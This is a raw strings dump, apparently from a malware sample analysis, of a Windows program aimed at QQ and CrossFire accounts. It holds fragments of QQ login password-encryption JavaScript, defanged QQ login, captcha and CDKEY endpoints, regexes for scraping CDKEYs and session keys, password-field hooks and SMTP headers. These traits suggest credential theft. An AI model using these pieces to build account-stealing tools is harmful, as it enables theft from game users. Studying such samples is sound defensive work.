N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aE   aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t  ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-'   this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG  = this.DB - aC)
aG  = this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = this.DV   aE
var t = this.abs(),
aE = z.abs();
aD[aC   t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z   t.t]  = t.am(z   1, 2 * t[z], aC, 2 * z   1, aD, t.t - z - 1)) >= t.DV) {
aC[z   t.t] -= t.DV;
aC[aC.t - 1]  = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT   (aG[aO - 1]   aR) * aS);
if ((aG[aO]  = aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl   (((z * this.mph   (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion < '5' && window.crypto && window.crypto.random) {
var H = window.crypto.random(32);
for (K = 0; K < H.length;   K) {
W[ae  ] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length;   ae) {
return o.next()
for (t = 0; t < z.length;   t) {
af.prototype.nextBytes = ax;
z = (z   this.S[aD]   aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B  ) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A  = 2) {
C  = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A  ) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C  ) {
var A = u.length;
for (var B = 0; B < E.length; B  ) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B  = 2) {
C[A  ] = parseInt(E.substr(B, 2), 16)
s.TEA = {
for (var B = 0; B < C.length; B  ) {
A  = String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   B   B);
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   G.charAt((H >> 6) & 63)   B);
return A.join('')
if (!window.btoa) {
window.btoa = d.encode
var hex = str.toString(16);
var len = hex.length;
arr.push('\\x'   hex.substr(j, 2))
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000'   c.length.toString(16);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len   rsaH1   s.TEA.strToBytes(salt)   vcodeLen   hexVcode);
s.TEA.initkey('');
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
function time(){return Math.random()}
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
pt_mbkey
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"~ /1~!<
fD.nn'1r?
.KM8'
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
o%%co
``PBi %c
<\-M}*0_
;ptlogin2
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
?kernel32.dll
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
SysShadow.Menu
Microsoft.XMLDOM
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
WSOCK32.dll
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetKeyboardState
InternetCanonicalizeUrlA
.FNNNNNNNNNNNNNNV
.FNNNNNNNNNNNN
.CNNNB
.CNNd
ÝDDDDDDQC
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
AVIFIL32.dll
MSVFW32.dll
oledlg.dll
RASAPI32.dll
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
2.6.0.0
VVV.cfzhushou.com

%original file name%.exe_3308_rwx_00401000_004DC000:

t$(SSh
~%UVW
u$SShe
wininet.dll
ole32.dll
kernel32.dll
user32.dll
User32.dll
Kernel32.dll
shell32.dll
gdiplus.dll
GdiPlus.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
ntdll.dll
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
atl.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ShellExecuteA
GetProcessHeap
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
[VVV.111Ttt.com]
-URL:
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
MsgBox
SysShadow.SubWnd
\exdui.dll
.rsrc
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
T.ZQ2
CDKEY
CDKEY:
ND ED9MS?WC [H6WU<fL.aF6bB=dM2aN<iE?hO1jL=jP.gP4cP>iQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WU<eL-bM;jP.cP>qN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WT<eL.bM;jP/dP>qN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WT<eL.bM:iP/dQ>qN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WT<eL.bM:iP/dQ>qN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRSWHE\NSWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTg^bfaIhdZir^saJxgX~p_fhhjmrmrhnqtxjermtzsjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[NSWXFWYX[^aXcI]dV]bciJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsivxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYXZ^aXcI]dV]bbiJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsjvxxz|
wW.Gg
NA EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
NA FE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE\OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
Z|.Gw
MA,FE9KR?WC*[I7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsjvxxz|
